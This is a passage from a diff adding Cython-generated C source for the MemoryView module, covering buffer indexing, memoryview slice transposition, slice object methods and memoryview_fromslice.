"View.MemoryView":921 + * resultp = bufp + index * stride + * if suboffset >= 0: + * resultp = ( resultp)[0] + suboffset # <<<<<<<<<<<<<< + * + * return resultp + */ + __pyx_v_resultp = ((((char **)__pyx_v_resultp)[0]) + __pyx_v_suboffset); + + /* "View.MemoryView":920 + * + * resultp = bufp + index * stride + * if suboffset >= 0: # <<<<<<<<<<<<<< + * resultp = ( resultp)[0] + suboffset + * + */ + } + + /* "View.MemoryView":923 + * resultp = ( resultp)[0] + suboffset + * + * return resultp # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_resultp; + goto __pyx_L0; + + /* "View.MemoryView":896 + * + * @cname('__pyx_pybuffer_index') + * cdef char *pybuffer_index(Py_buffer *view, char *bufp, Py_ssize_t index, # <<<<<<<<<<<<<< + * Py_ssize_t dim) except NULL: + * cdef Py_ssize_t shape, stride, suboffset = -1 + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("View.MemoryView.pybuffer_index", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":929 + * + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: # <<<<<<<<<<<<<< + * cdef int ndim = memslice.memview.view.ndim + * + */ + +static int __pyx_memslice_transpose(__Pyx_memviewslice *__pyx_v_memslice) { + int __pyx_v_ndim; + Py_ssize_t *__pyx_v_shape; + Py_ssize_t *__pyx_v_strides; + int __pyx_v_i; + int __pyx_v_j; + int __pyx_r; + int __pyx_t_1; + Py_ssize_t *__pyx_t_2; + long __pyx_t_3; + long __pyx_t_4; + Py_ssize_t __pyx_t_5; + Py_ssize_t __pyx_t_6; + int __pyx_t_7; + int __pyx_t_8; + int __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + #ifdef WITH_THREAD + PyGILState_STATE __pyx_gilstate_save; + #endif + + /* "View.MemoryView":930 + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: + * cdef int ndim = memslice.memview.view.ndim # <<<<<<<<<<<<<< + * + * cdef Py_ssize_t *shape = memslice.shape + */ + __pyx_t_1 = __pyx_v_memslice->memview->view.ndim; + __pyx_v_ndim = __pyx_t_1; + + /* "View.MemoryView":932 + * cdef int ndim = memslice.memview.view.ndim + * + * cdef Py_ssize_t *shape = memslice.shape # <<<<<<<<<<<<<< + * cdef Py_ssize_t *strides = memslice.strides + * + */ + __pyx_t_2 = __pyx_v_memslice->shape; + __pyx_v_shape = __pyx_t_2; + + /* "View.MemoryView":933 + * + * cdef Py_ssize_t *shape = memslice.shape + * cdef Py_ssize_t *strides = memslice.strides # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = __pyx_v_memslice->strides; + __pyx_v_strides = __pyx_t_2; + + /* "View.MemoryView":937 + * + * cdef int i, j + * for i in range(ndim // 2): # <<<<<<<<<<<<<< + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] + */ + __pyx_t_3 = __Pyx_div_long(__pyx_v_ndim, 2); + __pyx_t_4 = __pyx_t_3; + for (__pyx_t_1 = 0; __pyx_t_1 < __pyx_t_4; __pyx_t_1+=1) { + __pyx_v_i = __pyx_t_1; + + /* "View.MemoryView":938 + * cdef int i, j + * for i in range(ndim // 2): + * j = ndim - 1 - i # <<<<<<<<<<<<<< + * strides[i], strides[j] = strides[j], strides[i] + * shape[i], shape[j] = shape[j], shape[i] + */ + __pyx_v_j = ((__pyx_v_ndim - 1) - __pyx_v_i); + + /* "View.MemoryView":939 + * for i in range(ndim // 2): + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] # <<<<<<<<<<<<<< + * shape[i], shape[j] = shape[j], shape[i] + * + */ + __pyx_t_5 = (__pyx_v_strides[__pyx_v_j]); + __pyx_t_6 = (__pyx_v_strides[__pyx_v_i]); + (__pyx_v_strides[__pyx_v_i]) = __pyx_t_5; + (__pyx_v_strides[__pyx_v_j]) = __pyx_t_6; + + /* "View.MemoryView":940 + * j = ndim - 1 - i + * strides[i], strides[j] = strides[j], strides[i] + * shape[i], shape[j] = shape[j], shape[i] # <<<<<<<<<<<<<< + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: + */ + __pyx_t_6 = (__pyx_v_shape[__pyx_v_j]); + __pyx_t_5 = (__pyx_v_shape[__pyx_v_i]); + (__pyx_v_shape[__pyx_v_i]) = __pyx_t_6; + (__pyx_v_shape[__pyx_v_j]) = __pyx_t_5; + + /* "View.MemoryView":942 + * shape[i], shape[j] = shape[j], shape[i] + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: # <<<<<<<<<<<<<< + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + */ + __pyx_t_8 = ((__pyx_v_memslice->suboffsets[__pyx_v_i]) >= 0); + if (!__pyx_t_8) { + } else { + __pyx_t_7 = __pyx_t_8; + goto __pyx_L6_bool_binop_done; + } + __pyx_t_8 = ((__pyx_v_memslice->suboffsets[__pyx_v_j]) >= 0); + __pyx_t_7 = __pyx_t_8; + __pyx_L6_bool_binop_done:; + if (__pyx_t_7) { + + /* "View.MemoryView":943 + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") # <<<<<<<<<<<<<< + * + * return 0 + */ + __pyx_t_9 = __pyx_memoryview_err(PyExc_ValueError, __pyx_kp_s_Cannot_transpose_memoryview_with); if (unlikely(__pyx_t_9 == ((int)-1))) __PYX_ERR(1, 943, __pyx_L1_error) + + /* "View.MemoryView":942 + * shape[i], shape[j] = shape[j], shape[i] + * + * if memslice.suboffsets[i] >= 0 or memslice.suboffsets[j] >= 0: # <<<<<<<<<<<<<< + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + */ + } + } + + /* "View.MemoryView":945 + * _err(PyExc_ValueError, "Cannot transpose memoryview with indirect dimensions") + * + * return 0 # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = 0; + goto __pyx_L0; + + /* "View.MemoryView":929 + * + * @cname('__pyx_memslice_transpose') + * cdef int transpose_memslice(__Pyx_memviewslice *memslice) except -1 nogil: # <<<<<<<<<<<<<< + * cdef int ndim = memslice.memview.view.ndim + * + */ + + /* function exit code */ + __pyx_L1_error:; + #ifdef WITH_THREAD + __pyx_gilstate_save = __Pyx_PyGILState_Ensure(); + #endif + __Pyx_AddTraceback("View.MemoryView.transpose_memslice", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + #ifdef WITH_THREAD + __Pyx_PyGILState_Release(__pyx_gilstate_save); + #endif + __pyx_L0:; + return __pyx_r; +} + +/* "View.MemoryView":963 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + */ + +/* Python wrapper */ +static void __pyx_memoryviewslice___dealloc__(PyObject *__pyx_v_self); /*proto*/ +static void __pyx_memoryviewslice___dealloc__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__ (wrapper)", 0); + __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +static void __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(struct __pyx_memoryviewslice_obj *__pyx_v_self) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__dealloc__", 0); + + /* "View.MemoryView":964 + * + * def __dealloc__(self): + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) # <<<<<<<<<<<<<< + * + * cdef convert_item_to_object(self, char *itemp): + */ + __PYX_XCLEAR_MEMVIEW((&__pyx_v_self->from_slice), 1); + + /* "View.MemoryView":963 + * cdef int (*to_dtype_func)(char *, object) except 0 + * + * def __dealloc__(self): # <<<<<<<<<<<<<< + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "View.MemoryView":966 + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) + */ + +static PyObject *__pyx_memoryviewslice_convert_item_to_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("convert_item_to_object", 0); + + /* "View.MemoryView":967 + * + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: # <<<<<<<<<<<<<< + * return self.to_object_func(itemp) + * else: + */ + __pyx_t_1 = (__pyx_v_self->to_object_func != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":968 + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) # <<<<<<<<<<<<<< + * else: + * return memoryview.convert_item_to_object(self, itemp) + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_v_self->to_object_func(__pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 968, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "View.MemoryView":967 + * + * cdef convert_item_to_object(self, char *itemp): + * if self.to_object_func != NULL: # <<<<<<<<<<<<<< + * return self.to_object_func(itemp) + * else: + */ + } + + /* "View.MemoryView":970 + * return self.to_object_func(itemp) + * else: + * return memoryview.convert_item_to_object(self, itemp) # <<<<<<<<<<<<<< + * + * cdef assign_item_from_object(self, char *itemp, object value): + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = __pyx_memoryview_convert_item_to_object(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_itemp); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 970, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + } + + /* "View.MemoryView":966 + * __PYX_XCLEAR_MEMVIEW(&self.from_slice, 1) + * + * cdef convert_item_to_object(self, char *itemp): # <<<<<<<<<<<<<< + * if self.to_object_func != NULL: + * return self.to_object_func(itemp) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.convert_item_to_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":972 + * return memoryview.convert_item_to_object(self, itemp) + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) + */ + +static PyObject *__pyx_memoryviewslice_assign_item_from_object(struct __pyx_memoryviewslice_obj *__pyx_v_self, char *__pyx_v_itemp, PyObject *__pyx_v_value) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("assign_item_from_object", 0); + + /* "View.MemoryView":973 + * + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: # <<<<<<<<<<<<<< + * self.to_dtype_func(itemp, value) + * else: + */ + __pyx_t_1 = (__pyx_v_self->to_dtype_func != NULL); + if (__pyx_t_1) { + + /* "View.MemoryView":974 + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) # <<<<<<<<<<<<<< + * else: + * memoryview.assign_item_from_object(self, itemp, value) + */ + __pyx_t_2 = __pyx_v_self->to_dtype_func(__pyx_v_itemp, __pyx_v_value); if (unlikely(__pyx_t_2 == ((int)0))) __PYX_ERR(1, 974, __pyx_L1_error) + + /* "View.MemoryView":973 + * + * cdef assign_item_from_object(self, char *itemp, object value): + * if self.to_dtype_func != NULL: # <<<<<<<<<<<<<< + * self.to_dtype_func(itemp, value) + * else: + */ + goto __pyx_L3; + } + + /* "View.MemoryView":976 + * self.to_dtype_func(itemp, value) + * else: + * memoryview.assign_item_from_object(self, itemp, value) # <<<<<<<<<<<<<< + * + * cdef _get_base(self): + */ + /*else*/ { + __pyx_t_3 = __pyx_memoryview_assign_item_from_object(((struct __pyx_memoryview_obj *)__pyx_v_self), __pyx_v_itemp, __pyx_v_value); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 976, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_L3:; + + /* "View.MemoryView":972 + * return memoryview.convert_item_to_object(self, itemp) + * + * cdef assign_item_from_object(self, char *itemp, object value): # <<<<<<<<<<<<<< + * if self.to_dtype_func != NULL: + * self.to_dtype_func(itemp, value) + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.assign_item_from_object", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":978 + * memoryview.assign_item_from_object(self, itemp, value) + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.from_object + * + */ + +static PyObject *__pyx_memoryviewslice__get_base(struct __pyx_memoryviewslice_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("_get_base", 0); + + /* "View.MemoryView":979 + * + * cdef _get_base(self): + * return self.from_object # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_v_self->from_object); + __pyx_r = __pyx_v_self->from_object; + goto __pyx_L0; + + /* "View.MemoryView":978 + * memoryview.assign_item_from_object(self, itemp, value) + * + * cdef _get_base(self): # <<<<<<<<<<<<<< + * return self.from_object + * + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryviewslice_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryviewslice_1__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf___pyx_memoryviewslice___reduce_cython__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryviewslice___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw___pyx_memoryviewslice_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyObject *__pyx_pw___pyx_memoryviewslice_3__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf___pyx_memoryviewslice_2__setstate_cython__(((struct __pyx_memoryviewslice_obj *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf___pyx_memoryviewslice_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("View.MemoryView._memoryviewslice.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":999 + * + * @cname('__pyx_memoryview_fromslice') + * cdef memoryview_fromslice(__Pyx_memviewslice memviewslice, # <<<<<<<<<<<<<< + * int ndim, + * object (*to_object_func)(char *), + */ + +static PyObject *__pyx_memoryview_fromslice(__Pyx_memviewslice __pyx_v_memviewslice, int __pyx_v_ndim, PyObject *(*__pyx_v_to_object_func)(char *), int (*__pyx_v_to_dtype_func)(char *, PyObject *), int __pyx_v_dtype_is_object) { + struct __pyx_memoryviewslice_obj *__pyx_v_result = 0; + Py_ssize_t __pyx_v_suboffset; + PyObject *__pyx_v_length = NULL; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + __Pyx_TypeInfo *__pyx_t_4; + Py_buffer __pyx_t_5; + Py_ssize_t *__pyx_t_6; + Py_ssize_t *__pyx_t_7; + Py_ssize_t *__pyx_t_8; + Py_ssize_t __pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("memoryview_fromslice", 0); + + /* "View.MemoryView":1007 + * cdef _memoryviewslice result + * + * if memviewslice.memview == Py_None: # <<<<<<<<<<<<<< + * return None + * + */ + __pyx_t_1 = (((PyObject *)__pyx_v_memviewslice.memview) == Py_None); + if (__pyx_t_1) { + + /* "View.MemoryView":1008 + * + * if memviewslice.memview == Py_None: + * return None # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "View.MemoryView":1007 + * cdef _memoryviewslice result + * + * if memviewslice.memview == Py_None: # <<<<<<<<<<<<<< + * return None + * + */ + } + + /* "View.MemoryView":1013 + * + * + * result = _memoryviewslice.__new__(_memoryviewslice, None, 0, dtype_is_object) # <<<<<<<<<<<<<< + * + * result.from_slice = memviewslice + */ + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_v_dtype_is_object); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyTuple_New(3); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(Py_None); + __Pyx_GIVEREF(Py_None); + PyTuple_SET_ITEM(__pyx_t_3, 0, Py_None); + __Pyx_INCREF(__pyx_int_0); + __Pyx_GIVEREF(__pyx_int_0); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_int_0); + __Pyx_GIVEREF(__pyx_t_2); + PyTuple_SET_ITEM(__pyx_t_3, 2, __pyx_t_2); + __pyx_t_2 = 0; + __pyx_t_2 = ((PyObject *)__pyx_tp_new__memoryviewslice(((PyTypeObject *)__pyx_memoryviewslice_type), __pyx_t_3, NULL)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1013, __pyx_L1_error) + __Pyx_GOTREF((PyObject *)__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_v_result = ((struct __pyx_memoryviewslice_obj *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "View.MemoryView":1015 + * result = _memoryviewslice.__new__(_memoryviewslice, None, 0, dtype_is_object) + * + * result.from_slice = memviewslice # <<<<<<<<<<<<<< + * __PYX_INC_MEMVIEW(&memviewslice, 1) + * + */ + __pyx_v_result->from_slice = __pyx_v_memviewslice; + + /* "View.MemoryView":1016 + * + * result.from_slice = memviewslice + * __PYX_INC_MEMVIEW(&memviewslice, 1) # <<<<<<<<<<<<<< + * + * result.from_object = ( memviewslice.memview)._get_base() + */ + __PYX_INC_MEMVIEW((&__pyx_v_memviewslice), 1); + + /* "View.MemoryView":1018 + * __PYX_INC_MEMVIEW(&memviewslice, 1) + * + * result.from_object = ( memviewslice.memview)._get_base() # <<<<<<<<<<<<<< + * result.typeinfo = memviewslice.memview.typeinfo + * + */ + __pyx_t_2 = ((struct __pyx_vtabstruct_memoryview *)((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)->__pyx_vtab)->_get_base(((struct __pyx_memoryview_obj *)__pyx_v_memviewslice.memview)); if (unlikely(!__pyx_t_2)) __PYX_ERR(1, 1018, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_GIVEREF(__pyx_t_2); + __Pyx_GOTREF(__pyx_v_result->from_object); + __Pyx_DECREF(__pyx_v_result->from_object); + __pyx_v_result->from_object = __pyx_t_2; + __pyx_t_2 = 0; + + /* "View.MemoryView":1019 + * + * result.from_object = ( memviewslice.memview)._get_base() + * result.typeinfo = memviewslice.memview.typeinfo # <<<<<<<<<<<<<< + * + * result.view = memviewslice.memview.view + */ + __pyx_t_4 = __pyx_v_memviewslice.memview->typeinfo; + __pyx_v_result->__pyx_base.typeinfo = __pyx_t_4; + + /* "View.MemoryView":1021 + * result.typeinfo = memviewslice.memview.typeinfo + * + * result.view = memviewslice.memview.view # <<<<<<<<<<<<<< + * result.view.buf = memviewslice.data + * result.view.ndim = ndim + */ + __pyx_t_5 = __pyx_v_memviewslice.memview->view; + __pyx_v_result->__pyx_base.view = __pyx_t_5; + + /* "View.MemoryView":1022 + * + * result.view = memviewslice.memview.view + * result.view.buf = memviewslice.data # <<<<<<<<<<<<<< + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None + */ + __pyx_v_result->__pyx_base.view.buf = ((void *)__pyx_v_memviewslice.data); + + /* "View.MemoryView":1023 + * result.view = memviewslice.memview.view + * result.view.buf = memviewslice.data + * result.view.ndim = ndim # <<<<<<<<<<<<<< + * (<__pyx_buffer *> &result.view).obj = Py_None + * Py_INCREF(Py_None) + */ + __pyx_v_result->__pyx_base.view.ndim = __pyx_v_ndim; + + /* "View.MemoryView":1024 + * result.view.buf = memviewslice.data + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None # <<<<<<<<<<<<<< + * Py_INCREF(Py_None) + * + */ + ((Py_buffer *)(&__pyx_v_result->__pyx_base.view))->obj = Py_None; + + /* "View.MemoryView":1025 + * result.view.ndim = ndim + * (<__pyx_buffer *> &result.view).obj = Py_None + * Py_INCREF(Py_None) # <<<<<<<<<<<<<< + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: + */ + Py_INCREF(Py_None); + + /* "View.MemoryView":1027 + * Py_INCREF(Py_None) + * + * if (memviewslice.memview).flags & PyBUF_WRITABLE: # 